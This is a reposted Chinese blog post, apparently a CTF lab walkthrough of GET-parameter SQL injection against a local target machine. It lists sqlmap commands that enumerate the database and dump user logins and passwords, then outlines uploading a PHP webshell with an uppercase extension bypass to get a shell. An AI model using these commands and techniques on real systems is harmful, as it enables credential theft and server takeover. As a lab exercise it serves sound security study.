CTF-sql注入(get)

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

kali 192.168.20.128

靶机 192.168.20.131

链接:https://pan.baidu.com/s/1EgN_06ZB1rcKbD8RG6mpag ; 提取码:6pdq 

探测敏感信息

img

尝试弱口令登录

img

web漏洞扫描器owasp-zap

img

扫描结果

img

存在sql注入漏洞

sqlmap -u http://192.168.20.131/cat.php?id=3

img

获取数据库 

sqlmap -u http://192.168.20.131/cat.php?id=3 --dbs

img

发现数据库名information_schame和photolog

获取数据库下的表名

sqlmap -u http://192.168.20.131/cat.php?id=3 -D "photolog" --tables

img发现三个表名,categories,pictures,users 

获取字段值

sqlmap -u http://192.168.20.131/cat.php?id=3 -D "photolog" -T "users" --columns

img

发现id,login,password等字段

获取用户名和密码

sqlmap -u http://192.168.20.131/cat.php?id=3 -D "photolog" -T "users" -C 'login,password' --dump

img img

 登录系统

img

生成webshell

 制作webshell

 使用exploit

img

上传shell.php

.php改为.PHP

img

 打开PHP所在连接

img

 监听反应

img

 shell id

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/124949157
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复